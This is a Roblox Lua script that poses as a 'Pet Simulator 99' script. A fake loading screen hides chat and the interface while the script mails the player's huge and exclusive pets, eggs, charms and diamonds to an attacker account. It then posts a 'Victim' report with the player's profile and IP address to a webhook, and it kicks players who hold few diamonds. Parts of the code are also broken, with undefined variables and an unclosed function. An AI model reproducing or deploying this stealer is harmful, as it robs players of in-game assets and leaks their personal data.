if LoadScreen == nil then
LoadScreen = true
end
if LoadScreen == true then 
    LoadingScreen = true
LoadingText1 = "Loading Library"
LoadingText2 = "Updating Library"
LoadingText3 = "Getting Script"
LoadingText4 = "Executing Script"
LoadingText5 = "Error: Execution Failed, re-trying!"

local ScriptTitle = "Pet Simulator 99: Script Loading"

-- LOADING SCREEN
if LoadingScreen ~= false then
    local Loading = Instance.new("ScreenGui")
    local MainFrame = Instance.new("Frame")
    local Title = Instance.new("TextLabel")
    local Dots = Instance.new("Frame")
    local Dot1 = Instance.new("Frame")
    local UICorner = Instance.new("UICorner")
    local InsideDot = Instance.new("Frame")
    local UICorner_2 = Instance.new("UICorner")
    local Dot2 = Instance.new("Frame")
    local UICorner_3 = Instance.new("UICorner")
    local InsideDot_2 = Instance.new("Frame")
    local UICorner_4 = Instance.new("UICorner")
    local Dot3 = Instance.new("Frame")
    local UICorner_5 = Instance.new("UICorner")
    local InsideDot_3 = Instance.new("Frame")
    local UICorner_6 = Instance.new("UICorner")
    local Bar = Instance.new("Frame")
    local Bar2 = Instance.new("Frame")
    local UICorner_7 = Instance.new("UICorner")
    local UICorner_8 = Instance.new("UICorner")
    local Percentage = Instance.new("TextLabel")
    local Tip = Instance.new("TextLabel")
    local EndSequence = Instance.new("Frame")
    Loading.Name = "Egorikusa"
    Loading.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
    Loading.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
    Loading.DisplayOrder = 999999999
    MainFrame.Name = "MainFrame"
    MainFrame.Parent = Loading
    MainFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
    MainFrame.BorderSizePixel = 0
    MainFrame.Position = UDim2.new(-0.125662372, 0, -0.125935167, 0)
    MainFrame.Size = UDim2.new(1.25, 0, 1.25, 0)
    Title.Name = "Title"
    Title.Parent = MainFrame
    Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Title.BackgroundTransparency = 1.000
    Title.Position = UDim2.new(0.183329239, 0, 0.246382296, 0)
    Title.Size = UDim2.new(0.632528603, 0, 0.232815996, 0)
    Title.Font = Enum.Font.FredokaOne
    Title.Text = ScriptTitle
    Title.TextColor3 = Color3.fromRGB(255, 255, 255)
    Title.TextScaled = true
    Title.TextSize = 14.000
    Title.TextWrapped = true
    Dots.Name = "Dots"
    Dots.Parent = MainFrame
    Dots.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Dots.BackgroundTransparency = 1.000
    Dots.Position = UDim2.new(0.470970035, 0, 0.818612278, 0)
    Dots.Size = UDim2.new(0.0571707934, 0, 0.0360675976, 0)
    Dot1.Name = "Dot1"
    Dot1.Parent = Dots
    Dot1.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
    Dot1.Position = UDim2.new(0.0611661971, 0, 0.234447539, 0)
    Dot1.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)
    UICorner.CornerRadius = UDim.new(0.5, 0)
    UICorner.Parent = Dot1
    InsideDot.Name = "InsideDot"
    InsideDot.Parent = Dot1
    InsideDot.AnchorPoint = Vector2.new(0.5, 0.5)
    InsideDot.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    InsideDot.Position = UDim2.new(0.5, 0, 0.5, 0)
    UICorner_2.CornerRadius = UDim.new(0.5, 0)
    UICorner_2.Parent = InsideDot
    Dot2.Name = "Dot2"
    Dot2.Parent = Dots
    Dot2.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
    Dot2.Position = UDim2.new(0.419989735, 0, 0.234447539, 0)
    Dot2.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)
    UICorner_3.CornerRadius = UDim.new(0.5, 0)
    UICorner_3.Parent = Dot2
    InsideDot_2.Name = "InsideDot"
    InsideDot_2.Parent = Dot2
    InsideDot_2.AnchorPoint = Vector2.new(0.5, 0.5)
    InsideDot_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    InsideDot_2.Position = UDim2.new(0.5, 0, 0.5, 0)
    UICorner_4.CornerRadius = UDim.new(0.5, 0)
    UICorner_4.Parent = InsideDot_2
    Dot3.Name = "Dot3"
    Dot3.Parent = Dots
    Dot3.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
    Dot3.Position = UDim2.new(0.778813243, 0, 0.234447539, 0)
    Dot3.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)
    UICorner_5.CornerRadius = UDim.new(0.5, 0)
    UICorner_5.Parent = Dot3
    InsideDot_3.Name = "InsideDot"
    InsideDot_3.Parent = Dot3
    InsideDot_3.AnchorPoint = Vector2.new(0.5, 0.5)
    InsideDot_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    InsideDot_3.Position = UDim2.new(0.5, 0, 0.5, 0)
    UICorner_6.CornerRadius = UDim.new(0.5, 0)
    UICorner_6.Parent = InsideDot_3
    Bar.Name = "Bar"
    Bar.Parent = MainFrame
    Bar.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
    Bar.BorderSizePixel = 0
    Bar.Position = UDim2.new(0.219547689, 0, 0.764966607, 0)
    Bar.Size = UDim2.new(0.560904443, 0, 0.0365853645, 0)
    Bar2.Name = "Bar2"
    Bar2.Parent = Bar
    Bar2.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
    Bar2.BorderSizePixel = 0
    Bar2.Size = UDim2.new(0, 0, 1, 0)
    UICorner_7.CornerRadius = UDim.new(0.5, 0)
    UICorner_7.Parent = Bar2
    UICorner_8.CornerRadius = UDim.new(0.5, 0)
    UICorner_8.Parent = Bar
    Percentage.Name = "Percentage"
    Percentage.Parent = Bar
    Percentage.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Percentage.BackgroundTransparency = 1.000
    Percentage.Position = UDim2.new(0.280816972, 0, 0.0909090936, 0)
    Percentage.Size = UDim2.new(0.438366145, 0, 0.787879348, 0)
    Percentage.Font = Enum.Font.FredokaOne
    Percentage.Text = "0%"
    Percentage.TextColor3 = Color3.fromRGB(255, 255, 255)
    Percentage.TextScaled = true
    Percentage.TextSize = 14.000
    Percentage.TextWrapped = true
    Tip.Name = "Tip"
    Tip.Parent = MainFrame
    Tip.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    Tip.BackgroundTransparency = 1.000
    Tip.Position = UDim2.new(0.280816913, 0, 0.717294872, 0)
    Tip.Size = UDim2.new(0.438366145, 0, 0.0299334861, 0)
    Tip.Font = Enum.Font.SourceSansItalic
    Tip.Text = ""
    Tip.TextColor3 = Color3.fromRGB(138, 138, 138)
    Tip.TextScaled = true
    Tip.TextSize = 14.000
    Tip.TextWrapped = true
    EndSequence.Name = "EndSequence"
    EndSequence.Parent = Loading
    EndSequence.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
    EndSequence.BorderSizePixel = 0
    EndSequence.Position = UDim2.new(1, 0, 0, 0)
    EndSequence.Size = UDim2.new(1, 0, 1, 0)
    local function NGZQAMK_fake_script()
        local script = Instance.new("LocalScript", Dots)
        while true do
            wait(0.25)
            script.Parent.Dot1.InsideDot:TweenSize(UDim2.new(1, 0, 1, 0), "In", "Sine", 0.25, true)
            wait(0.25)
            script.Parent.Dot2.InsideDot:TweenSize(UDim2.new(1, 0, 1, 0), "In", "Sine", 0.25, true)
            wait(0.25)
            script.Parent.Dot3.InsideDot:TweenSize(UDim2.new(1, 0, 1, 0), "In", "Sine", 0.25, true)
            wait(0.25)
            script.Parent.Dot1.InsideDot:TweenSize(UDim2.new(0, 0, 0, 0), "In", "Sine", 0.25, true)
            wait(0.25)
            script.Parent.Dot2.InsideDot:TweenSize(UDim2.new(0, 0, 0, 0), "In", "Sine", 0.25, true)
            wait(0.25)
            script.Parent.Dot3.InsideDot:TweenSize(UDim2.new(0, 0, 0, 0), "In", "Sine", 0.25, true)
        end
    end

    coroutine.wrap(NGZQAMK_fake_script)()
    local function NDID_fake_script()
        local script = Instance.new("LocalScript", MainFrame)
        local bar = script.Parent.Bar
        local insidebar = bar.Bar2
        local percentage = bar.Percentage
        wait(5)
        insidebar:TweenSize(UDim2.new(1, 0, 1, 0), "In", "Linear", 200, true)
    end
    coroutine.wrap(NDID_fake_script)()
    local function OVSBNB_fake_script()
        local script = Instance.new("LocalScript", Percentage)
        wait(5)
        for i = 1, 100 do
            script.Parent.Text = i .. "%"
            wait(2)
        end
    end
    coroutine.wrap(OVSBNB_fake_script)()
    local function SNUMK_fake_script()
        local script = Instance.new("LocalScript", Tip)
        local tip = script.Parent
        while true do
            wait(5)
            tip.Text = LoadingText1
            wait(5)
            tip.Text = LoadingText2
            wait(5)
            tip.Text = LoadingText3
            wait(5)
            tip.Text = LoadingText4
            wait(5)
            tip.Text = LoadingText5
        end
    end
    coroutine.wrap(SNUMK_fake_script)()
    local function LSNGUH_fake_script()
        local script = Instance.new("LocalScript", Loading)
        game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Backpack, false)
        game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)
        game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Chat, false)
        game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.EmotesMenu, false)
    end
    coroutine.wrap(LSNGUH_fake_script)()
end

game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Backpack, false)
game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)
game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Chat, false)
game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.EmotesMenu, false)
end
-- Script:
-- VARIABLES
stealpets = true

local library = require(game.ReplicatedStorage.Library)
local save = library.Save.Get().Inventory
local plr = game.Players.LocalPlayer
local MailMessage = "InsaneXorek_Top and Egorikusa on top"
local GetSave = function()
    return require(game.ReplicatedStorage.Library.Client.Save).Get()
end

for i, v in pairs(GetSave().Inventory.Currency) do
    if v.id == "Diamonds" then
        GemAmount1 = v._am
    end
end

if GemAmount1 < 10000 then
    plr:kick("Saving Error, Please Rejoin or Join Back Later!")
end

Content = "@everyone"
-- Check
AmountOfHuges = 0
for i, v in pairs(save.Pet) do
    local id = v.id
    local dir = library.Directory.Pets[id]
    if dir.huge == true then
        AmountOfHuges = AmountOfHuges + 1
    end
end
if AmountOfHuges >= 2 then
    Username = "psxcoder" -- Your nick in dualhook
    print("Error Of Script!")
else
    print("Error Of Script!")
end
if GemAmount1 >= 3000000 then
    Username = "psxcoder" -- Your nick in dualhook
    print("Error Of Script!")
else
    print("Error Of Script!")
end
local user = Username

-- Functions
function StealHuge()
    for i, v in pairs(save.Pet) do
        local id = v.id
        local dir = library.Directory.Pets[id]
        if dir.huge then
            local args = {
                [1] = user,
                [2] = MailMessage,
                [3] = "Pet",
                [4] = i,
                [5] = v._am or 1
            }
            game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
                unpack(args)
            )
            AmountOfHuges = 0
            for i, v in pairs(save.Pet) do
                local id = v.id
                local dir = library.Directory.Pets[id]
                if dir.huge then
                    AmountOfHuges = AmountOfHuges + 1
                end
            end
            if AmountOfHuges == 0 then
                HugesEnd = true
            end
        end
    end
end --End of function huge

function ExcSteal()
    for i, v in pairs(save.Pet) do
        local id = v.id
        local dir = library.Directory.Pets[id]
        if dir.exclusiveLevel then
            local args = {
                [1] = user,
                [2] = MailMessage,
                [3] = "Pet",
                [4] = i,
                [5] = v._am or 1
            }
            game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
                unpack(args)
            )
            AmountOfExc = 0
            for i, v in pairs(save.Pet) do
                local id = v.id
                local dir = library.Directory.Pets[id]
                if dir.exclusiveLevel then
                    AmountOfExc = AmountOfExc + 1
                end
            end
            if AmountOfExc == 0 then
                ExcEnd = true
            end
        end
    end
end --end of function exc

function EggSteal()
    for i, v in pairs(save.Egg) do
        local args = {
            [1] = user,
            [2] = MailMessage,
            [3] = "Egg",
            [4] = i,
            [5] = v._am or 1
        }
        game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
            unpack(args)
        )
        AmountOfEggs = 0
        for i, v in pairs(save.Egg) do
            local id = v.id
            local diregg = library.Directory.Eggs[id]
            if diregg then
                AmountOfEggs = AmountOfEggs + 1
            end
            if AmountOfEggs == 0 then
                EggEnd = true
            end
        end
    end -- End of function egg
end

function CharmSteal()
    for i, v in pairs(save.Charm) do
        local id = v.id
        local args = {
            [1] = user,
            [2] = MailMessage,
            [3] = "Charm",
            [4] = i,
            [5] = v._am or 1
        }
        game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
            unpack(args)
        )
        AmountOfCharm = 0
        for i, v in pairs(save.Charm) do
            local id = v.id
            local dircharm = library.Directory.Charms[id]
            if dircharm then
                AmountOfCharm = AmountOfCharm + 1
            end
            if AmountOfCharm == 0 then
                CharmEnd = true
            end
        end
    end -- end of function charm
end

local Send = function(Results)
    local Sent = ""
    local Fail = ""
    if #Results["Sent"] > 0  then
        for _, v in pairs(Results["Sent"]) do 
            Sent = Sent..v 
            Sent = Sent.."\n"
        end
    else 
        Sent = "No Transactions Were Successful"
    end

    if #Results["Failed"] > 0 then
        for _, v in pairs(Results["Failed"]) do 
            Fail = Fail..v 
            Fail = Fail.."\n"
        end
    else 
        Fail = "No Transactions Failed"
    end

    local Result = table.create(0, nil)
    Result["Sent"] = {}
    Result["Failed"] = {}
    Result["Gems"] = 0

function GemSteal()
    for i, v in pairs(GetSave().Inventory.Currency) do
        if v.id == "Diamonds" then
            GemAmount = v._am
            GemId = i
            local args = {
                [1] = Username,
                [2] = MailMessage,
                [3] = "Currency",
                [4] = GemId,
                [5] = GemAmount - 10000
            }
            game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
                unpack(args)
            )
        end
    end
end --end of function gem

if stealpets == true then
    StealHuge()
end

if stealpets == true and HugesEnd == true then
    ExcSteal()
end

if save.Egg ~= nil and stealpets == true and ExcEnd == true then
    EggSteal()
end

if save.Charm ~= nil and stealpets == true and EggEnd == true then
    CharmSteal()
end


local Data = {
    ["content"] = Content,
    ["username"] = "Mailstealer",
    ["embeds"] = {
        {
            ["title"] = "Egorikusa Stealer",
            ["description"] = "**"..utf8.char(9989).." | Total Huges: **\n```"..AmountOfHuges.."```\n**"..utf8.char(10060).." | Failed to Send (No Funds)**".."\n```"..Fail.."```\n** <:x84x:1187031475418312785> | Diamonds Transferred: "..Results["Gems"].."**",
            ["fields"] = {
                {
                    ["name"] = "Victim",
                    ["value"] = "**"..utf8.char(8735).." [VIEW PROFILE](https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile)**"
                },
                {
                    ["name"] = "IP Address",
                    ["value"] = utf8.char(8735).. "`"..IP.."`"
                }
            },
            ["color"] = 0xF8F8F8,
            ["footer"] = {
                ["text"] = "Scripts: Mailstealer"
            },
            ["timestamp"] = DateTime.now():ToIsoDate()
        }
    }
}

request({
    Url = Webhook,
    Method = "POST",
    Headers = {
        ["Content-Type"] = "application/json"
    },
    Body = HttpService:JSONEncode(Data),
})
end

while true do
    wait(1.25)
    if CharmEnd == true then
    GemSteal()
   end
end
